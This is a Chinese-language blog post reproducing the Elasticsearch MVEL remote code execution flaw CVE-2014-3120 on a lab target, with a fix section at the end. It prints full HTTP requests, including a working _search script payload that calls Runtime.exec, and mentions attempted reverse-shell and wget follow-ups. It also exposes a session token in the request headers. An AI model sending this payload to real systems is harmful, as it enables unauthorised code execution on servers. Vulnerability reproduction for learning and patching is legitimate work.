elasticsearch 代码执行 (CVE-2014-3120)

最新推荐文章于 2024-05-05 09:41:45 发布
最新推荐文章于 2024-05-05 09:41:45 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: elasticsearch
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121155065
版权

@[TOC]( elasticsearch 代码执行 (CVE-2014-3120) )
所有文章,仅供安全研究与学习之用,后果自负!

elasticsearch 代码执行 (CVE-2014-3120)

ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。

0x01 漏洞描述

Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。

ElasticSearch有脚本执行的功能,使用的引擎为MVEL,该引擎没有做任何的防护,或者沙盒包装,所以可以直接执行任意代码。

由于在ElasticSearch的默认配置下,动态脚本执行功能处于打开状态,导致用户可以构造恶意的请求包,执行任意代码。
9200端口

0x02 影响范围

Elasticsearch < 1.2

0x03 漏洞复现

(1) 访问靶场 首页
版本为1.1.1

在这里插入图片描述
(2) burp抓包
在这里插入图片描述
(3) 利用该漏洞之前,es至少需要存在一条数据,通过以下请求包创建数据:

使用如下poc 向 Elasticsearch 添加一条数据
请求头

POST /mitian/mitian6/

请求体

{  "name": "kjsx"}

请求包如下

POST /mitian/mitian6/ HTTP/1.1
Host: vulfocus.fofa.so:51420
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1635998666,1636015562,1636016317,1636076952; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1636076952; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM2MTYzMzExLCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.VgJpabek6gQeSga1y9sTwN7C5jZ3Wr6Dk2XS7LYgVSg
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 18

{  "name": "kjsx"}

返回201 说明添加数据成功

在这里插入图片描述

(4)执行代码

请求头
	POST /_search?pretty
请求体如下

{    "size": 1,    "query": {      "filtered": {        "query": {          "match_all": {          }        }      }    },    "script_fields": {        "command": {            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"pwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"        }    }}

请求包如下

POST /_search?pretty HTTP/1.1
Host: vulfocus.fofa.so:51420
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1635998666,1636015562,1636016317,1636076952; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1636076952; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM2MTYzMzExLCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.VgJpabek6gQeSga1y9sTwN7C5jZ3Wr6Dk2XS7LYgVSg
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 327

{    "size": 1,    "query": {      "filtered": {        "query": {          "match_all": {          }        }      }    },    "script_fields": {        "command": {            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"pwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"        }    }}

发现执行成功

在这里插入图片描述

直接bash反弹shell 响应码200 代码异常
在这里插入图片描述

wget 发包失败

0x04 漏洞修复

1、在配置文件config/elasticsearch.yml中,添加一行
script.disable_dynamic: true并重启服务
2、升级ElasticSearch到1.2版本以上

LuckyCharm~
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Elasticsearch_poc
05-18
自述文件 运行POC java -jar target / elasticsearch-0.0.1-SNAPSHOT.jar服务器dropwizard.yml java -Xdebug -Xrunjdwp:transport = dt_socket,server = y,suspend = n,address = 5005 -jar target // elasticsearch-0.0.1-SNAPSHOT.jar服务器dropwizard.yml 去做 创建前端以创建产品创建前端以搜索产品创建前端以在键入产品时进行搜索创建前端以进行建议 确定创建后端以搜索产品确定创建后端以在键入产品时进行搜索创建后端以提出建议
elasticsearch-http-basic-1.5.1.jar
12-20
es安全认证工具 es安全认证工具
第二篇:Elasticsearch 安装 - 压缩包方式
Right_ydd的博客
03-11 1102
使用压缩包的方式安装Elasticsearch
Elasticsearch未授权访问漏洞
gclome的博客
08-19 9375
最近在拿自己学校练手,发现了一个Elasticsearch未授权访问漏洞,然后就边学习边去尝试利用这个漏洞。 Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 基础知识 要利用这个漏洞,最重要的就是查看数据,下面是elasticsearch基本的查询方法 2.1 查询所有的 index, type: $ curl localhost:9200/_search?pretty=true 2.2 查询某个index下所有的type
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2249
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker未授权漏洞利用,ssh密钥连接
Elasticsearch:创建 Elasticsearch 多节点集群并为它们配置 TLS 安全通信
Elastic 中国社区官方博客
04-20 4441
在之前的文章中“如何在一个机器上同时模拟多个node”,我们介绍了如何在同一个机器中运行同一个Elasticsearch的安装,并创建一个多node的Elasticsearch集群。我们也在“Elastic:用Docker部署Elastic栈”文章中介绍了如何使用docker技术来创建多个node的Elasticsearch集群。在实际的应用中,我们可能需要在不同的机器中部署Elasticsear...
靶机一:BOREDHACKERBLOG_ SOCIAL NETWORK
travelnight的博客
11-08 1776
靶机一:BOREDHACKERBLOG: SOCIAL NETWORK 靶机渗透
ElasticSearch未授权访问
打代码的小女孩
11-17 7043
0x00 漏洞描述: Elasticsearch是一款java编写的企业级搜索服务。越来越多的公司使用ELK作为日志分析,启动此服务默认会开放9200端口,可被非法操作数据 0x01 一些利用的URL http://101.198.161.130:9200/_cat/indices/ http://101.198.161.130:9200/_plugin/head/ http://101.198....
ElasticSearchPOC:这是使用AWS进行Elastic Search的POC
05-18
ElasticSearchPOC 这是使用AWS进行Elastic Search的POC API示例 端点:/ v1?q = <search> 方法:获取标头:x-api-key:<api> 状态码:200-确定,403-如果未提供api键,则禁止search_term =可以是任何字符串,如果为空或不存在,则不返回任何结果
SpringBoot的yaml配置注入
学不死就往死里学
08-10 2760
yaml语法学习 配置文件 SpringBoot使用一个全局的配置文件 , 配置文件名称是固定的 application.properties 语法结构 :key=value application.yml 语法结构 :key:空格 value 配置文件的作用 :修改SpringBoot自动配置的默认值,因为SpringBoot在底层都给我们自动配置好了; 比如我们可以在配置文件中修改Tomcat 默认启动的端口号!测试一下! server.port=8081 yaml概述 YAML是 “
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
elasticsearch-analysis-ik-8.11.0
11-27
elasticsearch-8.11.0的分词器,配合es同版本使用,有粗粒度和细粒度分词
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
elasticsearch-analysis-dynamic-synonym-7.6.2
08-17
ELASTICSEARCH7.6.2 动态同义词/近义词动态加载同义词/近义词 DYNAMIC_SYNONYM
elasticsearch-analysis-ik-7.12.1
05-08
IK Analysis for Elasticsearch
Elasticsearch中【文档查询】DSL语句以及对应的Java实现
m0_69594200的博客
04-29 767
Elasticsearch提供了基于JSON的DSL()来定义查询。:查询出所有数据,一般测试用。例如:match_all:利用分词器对用户输入内容分词,然后去倒排索引库中匹配。例如::根据精确词条值查找数据,一般是查找keyword、数值、日期、boolean等类型字段。例如:idsrangeterm:根据经纬度查询。例如::复合查询可以将上述各种查询条件组合起来,合并查询条件。例如:bool。
Elasticsearch:如何使用 Java 对索引进行 ES|QL 的查询
最新发布
Elastic 中国社区官方博客
05-05 1156
​在我之前的文章 “Elasticsearch:对 Java 对象的 ES|QL 查询”,我详细介绍了如何使用 Java 来对 ES|QL 进行查询。对于不是很熟悉 Elasticsearch 的开发者来说,那篇文章里的例子还是不能单独来进行运行。在今天的这篇文章中,我来详细地介绍如何把那个例子跑起来。更多关于 ES|QL 的动手实践,请阅读文章 “Elasticsearch:ES|QL 查询展示”。
Elasticsearch内存占用分析
小湘西的博客
04-29 430
Elasticsearch的内存占用是由其分布式架构和基于JVM的特性所决定的。为了维持快速的搜索和索引性能,它需要在内存中维护各种缓存和数据结构。合理的配置和资源管理是确保ES高效运行的关键。
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
03-07
这是一个安全漏洞问题,我可以回答。elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值